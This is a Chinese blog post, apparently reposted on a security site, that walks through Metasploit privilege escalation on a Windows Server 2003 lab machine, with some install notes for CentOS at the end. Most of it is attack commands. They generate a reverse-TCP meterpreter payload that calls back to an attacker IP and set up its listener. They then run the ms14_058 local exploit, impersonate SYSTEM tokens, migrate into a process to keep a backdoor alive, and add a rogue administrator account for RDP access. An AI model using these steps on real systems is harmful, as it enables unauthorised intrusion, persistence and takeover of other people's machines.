【提权】metasploit提权方法

admin 2022年1月10日03:32:34评论90 views字数 1650阅读5分30秒阅读模式

前言

常用的提权模块

metasploit 提权EXP存储文件夹路径

1
2
3
4
find / -name metasploit

一般都在
/usr/share/metasploit-framework/modules/exploits/windows/local

windows2003提权

环境:2003 server

1、生成攻击载荷

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=6666 -f exe > payload.exe

image-20210822161830954

2、接着在kali中运行msfconsole执行下面命令来监听(玩过msf应该都很熟悉)

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 6666
run

image-20210822162342445

3、首先去虚拟机中确认生成payload是否有用,发现得到session,可以去受害机进行执行获取session

image-20210822162555846

4、受害机已经获得shell了,然后上传这个payload去一个可读可写的目录,然后进行运行就可以拿到session,我直接用大马执行

image-20210822162940476

但是拿到的权限很低,接下来我们想办法上的system权限,但是getsystem/getprivs并不能在这里轻松提权

image-20210822163247489

5、接着用post里面的模块multi检测该系统可利用的提权模块

1
run post/multi/recon/local_exploit_suggester

image-20210822164314210

可以发现有很多,我们随便选一个ms14_058的吧,先background收起sessions,然后再进行利用

1
2
background
use exploit/windows/local/ms14_058_track_popup_menu

先看看sess的id以确定利用时所选的set

1
session -l 查看id

image-20210822164556586

然后set session 1

image-20210822164621415

接着提权成功,很自动化,很无脑提权到最高权限

image-20210822164659711

一些基础命令的使用和记录

1
2
ps 查看pid
migrate 3420 注入进程维持后门 这样每次系统启动都会连接服务器

image-20210822210706115

接着常规操作,有系统权限,增加用户

1
2
shell 进入cmd命令操作
net user gylq gylq /add & net localgroup administrators gylq /add 增加超级管理员

image-20210822211238723

对方在公网的话,直接登3389,kali的话用

1
rdesktop 192.168.0.115

image-20210822211628791

在介绍一下ms16-075的提权方法

还是回到普通权限

1、伪造身份

1
2
use incognito
list_tokens -u //查看当前伪造的身份

image-20210823131003045

2、执行一下ms075的potato.exe其实,上面已经显示可以提权了

1
execute -cH -f C:/RECYCLER/potato.exe

3、直接伪造系统身份

1
impersonate_token "NT AUTHORITY\SYSTEM"

image-20210823132854144

记录一些msf在centos安装采坑

安装msf的具体命令如下

1
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

接着本地出现msfinstall,然后给权限和安装

1
2
3
chmod 755 msfinstall

./msfinstall //就可以直接启动了

msf卸载方法(出现故障使用)

1
yum remove metasploit-framework

msfupdate之后需要进行环境变量配置

1
export PATH="/opt/metasploit-framework/bin:$PATH"

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:32:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【提权】metasploit提权方法https://cn-sec.com/archives/729991.html

发表评论

匿名网友 填写信息